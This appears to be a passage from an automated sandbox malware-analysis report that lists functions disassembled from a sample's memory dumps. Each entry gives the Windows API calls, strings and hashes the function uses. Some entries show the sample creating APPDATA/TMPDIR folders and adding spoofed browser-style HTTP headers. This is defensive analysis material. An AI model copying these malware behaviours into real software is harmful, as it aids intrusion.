                                          • Instruction Fuzzy Hash: 91E06DB62C92252DE12195155E22AFBA7ADDBE7731B20402AF640C79C2C394894E8276
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2612219452.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2612202169.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612243212.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612263548.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                          • Instruction ID: 49573a245b17cd2143a7f0a663dc82b9d5ba07e6c12e429f55ccbb336c262c76
                                          • Opcode Fuzzy Hash: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                          • Instruction Fuzzy Hash: CEE08C32E11228EBCB10CB88C940E8AB3ECFB86A80F114096B505E3101D274DF00C7C2
                                          APIs
                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,00409B7B), ref: 00409BA9
                                          • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409B7B), ref: 00409BB4
                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409B7B), ref: 00409BC5
                                          • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00409BD7
                                          • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00409BE5
                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409B7B), ref: 00409C08
                                          • DeleteCriticalSection.KERNEL32(0042D064,00000007,?,?,00409B7B), ref: 00409C24
                                          • CloseHandle.KERNEL32(00000000,?,?,00409B7B), ref: 00409C34
                                          Strings
                                          • WakeAllConditionVariable, xrefs: 00409BDD
                                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00409BAF
                                          • kernel32.dll, xrefs: 00409BC0
                                          • SleepConditionVariableCS, xrefs: 00409BD1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                          • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                          • API String ID: 2565136772-3242537097
                                          • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                          • Instruction ID: 37dafa969150eeb09f2d68ad9d46abae469e8d92b579355ddc2ecf38041403ba
                                          • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                          • Instruction Fuzzy Hash: 4B017531F44721BBE7205BB4BC09F563AE8AB48715F544032F905E22A2DB78CC078A6C
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 10001CE7
                                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,00000264,1000202E,?), ref: 10001D2D
                                          • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000), ref: 10001DE9
                                          • GetLastError.KERNEL32(?,?,00000001,00000000), ref: 10001DF9
                                          • GetTempPathA.KERNEL32(00000104,?,?,?,00000001,00000000), ref: 10001E12
                                          • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ECC
                                          • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ED2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2612219452.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2612202169.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612243212.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612263548.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                          Similarity
                                          • API ID: CreateDirectoryErrorLastPath$FolderH_prolog3_Temp
                                          • String ID: APPDATA$TMPDIR
                                          • API String ID: 1838500112-4048745339
                                          • Opcode ID: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                          • Instruction ID: 65cc4f0b8c34a884811309b14049f09b1d2f67be4c4777eb46c939f585e6cab7
                                          • Opcode Fuzzy Hash: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                          • Instruction Fuzzy Hash: 6B515E70900259EAFB64EBA4CC89BDDB7B9EF04380F5005E9E109A6055DB74AFC4CF61
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 100010CE
                                          • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001103
                                          • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001123
                                          • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001143
                                          • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001163
                                          Strings
                                          • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 10001105
                                          • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 10001125
                                          • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001145
                                          • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 100010D9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2612219452.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2612202169.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612243212.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612263548.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                          Similarity
                                          • API ID: HeadersHttpRequest$H_prolog3_
                                          • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          • API String ID: 1254599795-787135837
                                          • Opcode ID: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                          • Instruction ID: 505ec4d7c45309835e960384523a5e30396a54de81b8e769e2ad7823f420ed9d
                                          • Opcode Fuzzy Hash: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                          • Instruction Fuzzy Hash: DA119372D0010DEEEB10DBA9DC91DEEBB78EB18351FA0C019F22176051DB75AA45DBB1
                                          APIs
                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0041CE8F), ref: 0041C3A8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: DecodePointer
                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                          • API String ID: 3527080286-3064271455
                                          • Opcode ID: 05187ea62b41d2bf9bc39929cbb8bd1b88e738aa0c5724388b28886b27f4fa98
                                          • Instruction ID: c807006a3b6ff10d3a002f023a5ec1143af0d4f8941b6a10615b45774aafcbb0
                                          • Opcode Fuzzy Hash: 05187ea62b41d2bf9bc39929cbb8bd1b88e738aa0c5724388b28886b27f4fa98
                                          • Instruction Fuzzy Hash: A751CC7098422AEBCB108F98ED9C5FE7F71FB05304F908057D480A6664C7BC99A6CB5D
                                          APIs
                                          • type_info::operator==.LIBVCRUNTIME ref: 04B4C041
                                          • ___TypeMatch.LIBVCRUNTIME ref: 04B4C14F
                                          • _UnwindNestedFrames.LIBCMT ref: 04B4C2A1
                                          • CallUnexpected.LIBVCRUNTIME ref: 04B4C2BC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                          • String ID: csm$csm$csm
                                          • API String ID: 2751267872-393685449
                                          • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                          • Instruction ID: e769a1497f5f0b0bf19501427c623a02dc9f3c0e8932f9e3e1ab43ee31c592b3
                                          • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                          • Instruction Fuzzy Hash: 0CB1BC31901209EFDF15DFA4C8809AEBBB4FF84B14F12409AE9156B611D375FA21EFA1
                                          APIs
                                          • type_info::operator==.LIBVCRUNTIME ref: 04D0B1DA
                                          • ___TypeMatch.LIBVCRUNTIME ref: 04D0B2E8
                                          • _UnwindNestedFrames.LIBCMT ref: 04D0B43A
                                          • CallUnexpected.LIBVCRUNTIME ref: 04D0B455
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000003.1947099269.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                          Similarity
                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                          • String ID: csm$csm$csm
                                          • API String ID: 2751267872-393685449
                                          • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                          • Instruction ID: 7b6221219bb55dbb89d748f8856a00264ef97102b8050ef18d9d3324b3a3e2c7
                                          • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                          • Instruction Fuzzy Hash: 42B14671904609EFDF29DFE4C880AAEBBB5FF04314B14C15AE8116B295E770FA51CBA1
                                          APIs
                                          • type_info::operator==.LIBVCRUNTIME ref: 10004250
                                          • ___TypeMatch.LIBVCRUNTIME ref: 1000435E
                                          • _UnwindNestedFrames.LIBCMT ref: 100044B0
                                          • CallUnexpected.LIBVCRUNTIME ref: 100044CB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2612219452.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2612202169.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612243212.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612263548.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                          Similarity
                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                          • String ID: csm$csm$csm
                                          • API String ID: 2751267872-393685449
                                          • Opcode ID: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                          • Instruction ID: 3d3d7b973083d5502e03e9704e538657a8ad6664bd6ca03923258a49de60437f
                                          • Opcode Fuzzy Hash: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                          • Instruction Fuzzy Hash: C0B180B5C00209DFEF05DF94D881A9EBBB9FF04390F12415AF8116B21ADB31EA51CB99
                                          APIs
                                          • type_info::operator==.LIBVCRUNTIME ref: 0040BDDA
                                          • ___TypeMatch.LIBVCRUNTIME ref: 0040BEE8
                                          • _UnwindNestedFrames.LIBCMT ref: 0040C03A
                                          • CallUnexpected.LIBVCRUNTIME ref: 0040C055
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                          • String ID: csm$csm$csm
                                          • API String ID: 2751267872-393685449
                                          • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                          • Instruction ID: 526bd2c442181307887733989819878d768e136a746cf2eec307868f2bd45ee9
                                          • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                          • Instruction Fuzzy Hash: EEB1477180020AEBCF25DFA5C8819AEBBB5EF04314B14416BE815BB292D738DA51CFDD
                                          APIs
                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,04B49DE2), ref: 04B49E10
                                          • GetModuleHandleW.KERNEL32(0041FFC8,?,?,04B49DE2), ref: 04B49E1B
                                          • GetModuleHandleW.KERNEL32(0042000C,?,?,04B49DE2), ref: 04B49E2C
                                          • GetProcAddress.KERNEL32(00000000,00420028), ref: 04B49E3E
                                          • GetProcAddress.KERNEL32(00000000,00420044), ref: 04B49E4C
                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04B49DE2), ref: 04B49E6F
                                          • RtlDeleteCriticalSection.NTDLL(0042D064), ref: 04B49E8B
                                          • CloseHandle.KERNEL32(0042D060,?,?,04B49DE2), ref: 04B49E9B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                          • String ID:
                                          • API String ID: 2565136772-0
                                          • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                          • Instruction ID: 0490debc15bb4a8c0a4d31c76c5214d529bf7ff565f83897017f23eb67320fec
                                          • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                          • Instruction Fuzzy Hash: 51017571F80711ABD7305BB4FC0DF973AE8EB88B05B504475F905E2165DB64D80B9A68
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _strrchr
                                          • String ID:
                                          • API String ID: 3213747228-0
                                          • Opcode ID: 40243c521aab70af30abc9ec0642881d9f494199df659fe1a780e76705c17a36
                                          • Instruction ID: f0959f5707d28880e6a4cf676283cfc3501dcefef9f6dc977072ec63deb0a225
                                          • Opcode Fuzzy Hash: 40243c521aab70af30abc9ec0642881d9f494199df659fe1a780e76705c17a36
                                          • Instruction Fuzzy Hash: 55B17872A00265AFEB118F64CC81BAEFFB5EF55344F1441E5ED04AF2A1D275B981C7A0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000003.1947099269.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                          Similarity
                                          • API ID: _strrchr
                                          • String ID:
                                          • API String ID: 3213747228-0
                                          • Opcode ID: 40243c521aab70af30abc9ec0642881d9f494199df659fe1a780e76705c17a36
                                          • Instruction ID: 417bccfef4060ed6a3966fa8bbcf6eb7b6f96e728a362a52769359c78c714c5c
                                          • Opcode Fuzzy Hash: 40243c521aab70af30abc9ec0642881d9f494199df659fe1a780e76705c17a36
                                          • Instruction Fuzzy Hash: 74B14772A00295BFFB12CFA8EC81BAE7BA5FF55310F144165ED04AB2A1D674F901C7A0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: _strrchr
                                          • String ID:
                                          • API String ID: 3213747228-0
                                          • Opcode ID: bf0b0920984447c06244afe43fd9d6a0130e4e86955e3e91be41bedb8128cd91
                                          • Instruction ID: 4a21b80fcc43a582202c6f7144ab3ce64f52356938c116e7343db5097d41ee6d
                                          • Opcode Fuzzy Hash: bf0b0920984447c06244afe43fd9d6a0130e4e86955e3e91be41bedb8128cd91
                                          • Instruction Fuzzy Hash: 57B13672E003559FDB118F65CC81BEF7FA5EF59310F14416BE904AB382D2789A82C7A8
                                          APIs
                                          • __RTC_Initialize.LIBCMT ref: 1000291D
                                          • ___scrt_uninitialize_crt.LIBCMT ref: 10002937
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2612219452.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2612202169.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612243212.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612263548.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                          Similarity
                                          • API ID: Initialize___scrt_uninitialize_crt
                                          • String ID:
                                          • API String ID: 2442719207-0
                                          • Opcode ID: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                          • Instruction ID: 04769ff959a67eddfc0a91c70c155494b73e6b711ec1a15a155288148215b0b0
                                          • Opcode Fuzzy Hash: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                          • Instruction Fuzzy Hash: 3741F372E05229AFFB21CF68CC41BAF7BA4EB846D0F114119F84467258DB309E419BA1
                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 04D0ABF7
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 04D0ABFF
                                          • _ValidateLocalCookies.LIBCMT ref: 04D0AC88
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 04D0ACB3
                                          • _ValidateLocalCookies.LIBCMT ref: 04D0AD08
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000003.1947099269.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm
                                          • API String ID: 1170836740-1018135373
                                          • Opcode ID: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                          • Instruction ID: f3c310302b0c40c20b9b34b855988e141cdf130191ac3f7e6030e8d48a8665a6
                                          • Opcode Fuzzy Hash: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                          • Instruction Fuzzy Hash: 8641A134B00308ABCF10DF68C884B9EBBA5FF44328F15C155E8155B391D775B905CBA5
                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 10003A57
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 10003A5F
                                          • _ValidateLocalCookies.LIBCMT ref: 10003AE8
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 10003B13
                                          • _ValidateLocalCookies.LIBCMT ref: 10003B68
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2612219452.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2612202169.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612243212.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612263548.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm
                                          • API String ID: 1170836740-1018135373
                                          • Opcode ID: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                          • Instruction ID: 53213870faae5245fec6ed73a44d54790f208d332314260de239e107b7581961
                                          • Opcode Fuzzy Hash: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                          • Instruction Fuzzy Hash: 2A41E434A002189FDF02CF68C881A9FBBF9EF453A8F11C065E9149B356C771EA15CB91
                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 0040B7F7
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0040B7FF
                                          • _ValidateLocalCookies.LIBCMT ref: 0040B888
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 0040B8B3
                                          • _ValidateLocalCookies.LIBCMT ref: 0040B908
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm
                                          • API String ID: 1170836740-1018135373
                                          • Opcode ID: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                          • Instruction ID: 0a5d0bd6c222bbdd43f8b319fa79a96d429a9708f3c046b0ae0cbd11a01f7e51
                                          • Opcode Fuzzy Hash: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                          • Instruction Fuzzy Hash: 11418535A00219DBCF10EF69C885A9EBBA5EF44318F14C17AE8147B3E2D7399905CBD9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2612219452.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2612202169.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612243212.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612263548.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: api-ms-$ext-ms-
                                          • API String ID: 0-537541572
                                          • Opcode ID: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                          • Instruction ID: 4a8ea71034e84b8525c0961ad639e20c08c2bf99947945f029ec6b94e21b7784
                                          • Opcode Fuzzy Hash: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                          • Instruction Fuzzy Hash: DC219671E01321EBF722DB648C81A4E37A4FB456E0B214124ED59A7195D778EE00A6E1
                                          APIs
                                          • FreeLibrary.KERNEL32(00000000,?,00413448,00403597,?,00000000,00402809,0040280B,?,004135C1,00000022,FlsSetValue,00422950,00422958,00402809), ref: 004133FA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID: api-ms-$ext-ms-
                                          • API String ID: 3664257935-537541572
                                          • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                          • Instruction ID: 89836d951bc72d4e20e2faa1a52db581b462940ce5fd44a8dff6846afbaeb460
                                          • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                          • Instruction Fuzzy Hash: A3212731B01214EBDB329F21DC44ADB7B68AB41765B200133ED15A73D1DA78EE46C6DC
                                          APIs
                                          • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 1000B720
                                          • __fassign.LIBCMT ref: 1000B905
                                          • __fassign.LIBCMT ref: 1000B922
                                          • WriteFile.KERNEL32(?,10009A1A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000B96A
                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1000B9AA
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000BA52
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2612219452.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2612202169.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612243212.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612263548.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                          Similarity
                                          • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                          • String ID:
                                          • API String ID: 1735259414-0
                                          • Opcode ID: 56600ca1f679adaeecf8f36430617c19199fd47716f68d51f6ae8f72f541c1cc
                                          • Instruction ID: 817bf58f8fa712ded97291eda06853010b29bdec4c6be72b636a35a8a914ce65
                                          • Opcode Fuzzy Hash: 56600ca1f679adaeecf8f36430617c19199fd47716f68d51f6ae8f72f541c1cc
                                          • Instruction Fuzzy Hash: 9DC1CF75D006989FEB11CFE8C8809EDBBB5EF09354F28816AE855F7245D631AE42CB60
                                          APIs
                                          • GetLastError.KERNEL32(?,?,04B4BBE2,04B4B186,04B4A997), ref: 04B4BBF9
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04B4BC07
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04B4BC20
                                          • SetLastError.KERNEL32(00000000,04B4BBE2,04B4B186,04B4A997), ref: 04B4BC72
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                          • Instruction ID: 948b75f0dacd5e703a0ffa94fb081c7944eb862a2756ca3a4c962dab02375754
                                          • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                          • Instruction Fuzzy Hash: 75018D3630D611DEA73427BD7CC496B2F54E78567C72002B9E625561E2EE51F4017184
                                          APIs
                                          • GetLastError.KERNEL32(00000001,?,10003C01,10002DB0,100027A7,?,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8), ref: 10003E08
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003E16
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003E2F
                                          • SetLastError.KERNEL32(00000000,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8,?,00000001,?), ref: 10003E81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2612219452.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2612202169.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612243212.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000000.00000002.2612263548.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                          • Instruction ID: cea4d4d1ab0609a38d25ccf127c64f3389598815618148a6298b3cccc824aafb
